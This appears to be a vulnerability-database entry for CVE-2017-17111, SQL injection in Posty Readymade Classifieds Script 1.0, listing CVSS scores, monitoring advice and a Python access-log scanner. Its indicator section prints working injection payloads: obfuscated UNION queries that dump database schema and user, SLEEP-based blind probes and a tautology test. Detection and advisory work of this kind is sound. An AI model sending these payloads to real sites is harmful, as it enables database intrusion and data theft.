cbcvebase.
CVE-2017-17111
published 2017-12-11

CVE-2017-17111: Posty Readymade Classifieds Script 1.0 allows an attacker to inject SQL commands via a listings.php?catid= or ads-details.php?ID= request.

Priority: P263 | critical | 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 8.80% (94.5th percentile)

Affected

1 range
Vendor | Product | Version range | Fixed in
scubez | posty_readymade_classifieds | |

Detection & IOCs (extracted from sources)

url: http://server/listings.php?catid=-1++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)))--+-
url: http://server/ads-details.php?ID=-265++/*!08888UNION*/(/*!08888SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26))--+-
path: /listings.php
path: /ads-details.php
command: catid=' AND SLEEP(5)-- tCbs
command: catid=-7326' OR 9205=9205#
command: ID=265 AND SLEEP(5)
command: ID=-5939 UNION ALL SELECT NULL,NULL,CONCAT(0x716a626271,0x664f68565771437a5444554e794f547462774e65574f43616b767945464c416d524b646f48675a67,0x71787a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZIaY
  • Monitor GET requests to listings.php with a 'catid' parameter containing SQL injection patterns, particularly MySQL-specific inline comment syntax /*!08888...*/ and UNION-based payloads.
  • Monitor GET requests to ads-details.php with an 'ID' parameter containing SQL injection patterns, including UNION SELECT, SLEEP(), and boolean-based blind payloads.
  • Detect use of MySQL versioned comment obfuscation token '/*!08888' in HTTP query strings, which is a distinctive fingerprint of this exploit's payloads.
  • Detect time-based blind SQLi attempts via SLEEP(5) in the catid or ID GET parameters.
  • The UNION-based payload for ads-details.php uses exactly 26 columns; detect anomalous UNION SELECT statements with a large number of NULL columns in the ID parameter.
  • The exploit targets Posty Readymade Classifieds Script version 1.0 only; later versions may not be affected.
  • The exploit was tested on Windows 7 x64 and Kali Linux x64; behavior on other platforms may differ.
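
The monitoring checks listed above can be run over web-server access logs. The following is an added example, not code from the advisory or the vendor: the rule names, the 10-column NULL threshold, the combined-log line format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script name -> injectable parameter, as named in the advisory.
TARGETS = {"listings.php": "catid", "ads-details.php": "id"}
RULES = [  # applied after comment wrappers are stripped
    ("union-select", re.compile(r"union[\s(]*(?:all[\s(]*)?select", re.I)),
    ("time-based-sleep", re.compile(r"sleep\s*\(\s*\d+\s*\)", re.I)),
    ("boolean-tautology", re.compile(r"\bor\s+(\d+)\s*=\s*\1\b", re.I)),
    # Threshold of 10 NULL columns is an assumption; the page reports 26 columns.
    ("wide-null-union", re.compile(r"(?:null\s*,\s*){10,}", re.I)),
]
LINE_RX = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect(target):
    """Return sorted rule names matched by one request target (path?query)."""
    parts = urlsplit(target)
    param = TARGETS.get(parts.path.rsplit("/", 1)[-1].lower())
    hits = set()
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if param is None or key.lower() != param:
            continue  # only the two affected parameters are in scope
        if "/*!08888" in value:  # obfuscation token, checked before stripping
            hits.add("versioned-comment-08888")
        flat = re.sub(r"/\*!?\d*|\*/", " ", value)  # unwrap /*!NNNNN ... */
        hits.update(name for name, rx in RULES if rx.search(flat))
    return sorted(hits)

def scan(lines):
    """Return (client, target, hits) for every flagged access-log line."""
    found = []
    for line in lines:
        m = LINE_RX.match(line)
        hits = inspect(m.group(2)) if m else []
        if hits:
            found.append((m.group(1), m.group(2), hits))
    return found

def _log(ip, target):  # constructed sample line in combined-log style
    return f'{ip} - - [11/Dec/2017:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'

SAMPLE_LOG = [  # constructed inputs, not captured traffic
    _log("198.51.100.7", "/listings.php?catid=12"),
    _log("203.0.113.9", "/listings.php?catid=%27%20AND%20SLEEP(5)--%20tCbs"),
    _log("203.0.113.9", "/ads-details.php?ID=-1++/*!08888UNION*/(/*!08888SELECT*/(1),(2))--+-"),
    _log("203.0.113.9", "/shop/ads-details.php?ID=-1%20UNION%20ALL%20SELECT%20" + ",".join(["NULL"] * 26) + "--%20x"),
    _log("203.0.113.9", "/listings.php?catid=-7326%27%20OR%209205=9205%23"),
    _log("198.51.100.7", "/search.php?q=sleep(5)+tips"),
]

if __name__ == "__main__":
    for client, target, hits in scan(SAMPLE_LOG):
        print(client, hits, target[:60])
```

Matching runs on the URL-decoded parameter value, so percent-encoded and `+`-separated variants are covered. Restricting the rules to the two affected scripts keeps unrelated query strings such as the `search.php` line from raising alerts.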

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P